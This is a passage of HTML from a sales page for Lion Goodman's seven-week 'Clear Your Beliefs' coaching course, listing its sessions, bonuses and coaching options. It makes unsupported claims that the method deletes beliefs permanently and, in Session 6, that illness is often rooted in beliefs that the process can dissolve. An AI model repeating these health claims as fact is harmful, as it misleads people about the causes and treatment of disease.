alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> It’s that simple.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n\r\nWhy did I say that?\r\nWhat’s wrong with me?\r\nWhy didn’t I follow through?\r\nWhy did I react that way?\r\nWhat the hell just happened?\r\n\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n\r\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\r\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\r\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\r\n\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\r\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\r\n\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />You''re no longer held back by old beliefs and stories.\r\n\r\nThere''s no resistance to doing what needs to be done.\r\n\r\nYou feel joy and positive energy as you move forward to create the life of your dreams.\r\n\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\r\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\r\nGive you the power to change your experiences – and your circumstances – at will.\r\nShow you how to gain mastery over your moods, perceptions, and responses.\r\n\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n\r\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\r\n<h1>With This Methodology, You Can Finally:</h1>\r\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\r\nRemove resistance and barriers\r\nOpen doors to new opportunities\r\nEliminate pain and suffering from the past\r\nExperience more fulfillment in your relationships\r\nAttract more abundance and prosperity\r\nIncrease your energy, vitality, and productivity\r\n\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n\r\n&nbsp;\r\n<h1>A Message from Lion Goodman...</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\r\nDear Explorer:\r\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\r\n\r\nIn gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\r\n\r\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n<strong> In Session 1, you will:</strong>\r\n\r\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\r\nLearn which ones keep you stuck, preventing you from having what you want in life\r\nExperience a process that returns you to your True Self, the home of inner joy and bliss\r\nBegin to work with, not against, your subconscious mind – where your beliefs reside\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\r\n\r\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n<strong> In Session 2, you will:</strong>\r\n\r\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\r\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\r\nSee your own magnificence through a new clear lens of your own beauty and joy\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\r\n\r\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\r\n\r\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\r\n\r\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\r\n\r\n<strong> In Session 3, you will:</strong>\r\n\r\nIdentify old beliefs that stand between you and creating the life you want\r\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\r\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\r\n\r\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n&nbsp;\r\n\r\n<strong> In Session 4, you will:</strong>\r\n\r\nLook deeply into the childhood patterns that enabled you to survive and thrive\r\nSee which of your beliefs now interfere with your intimate relationships\r\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\r\n\r\n<strong> In Session 5, you will:</strong>\r\n\r\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\r\nRemove beliefs that create stumbling blocks in the way of natural abundance\r\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\r\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\r\n\r\n<strong> In Session 6, you will:</strong>\r\n\r\nIdentify old beliefs that stand between you and vibrant health\r\nRecognize beliefs that make you vulnerable to disease and injury\r\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\r\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n<strong> In Session 7, you will:</strong>\r\n\r\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\r\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\r\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n\r\nBonus #1:  <strong>Love:  What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong>\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n\r\nBe called to awaken your already-powerful ability to create the life of your dreams\r\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\r\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\r\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\r\nLearn a process that can strengthen your power of intention\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #5:<strong> Change Your Beliefs eBook</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\r\n\r\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\r\n\r\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #6: <strong>Complete Transcripts of the Course</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n&nbsp;\r\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of 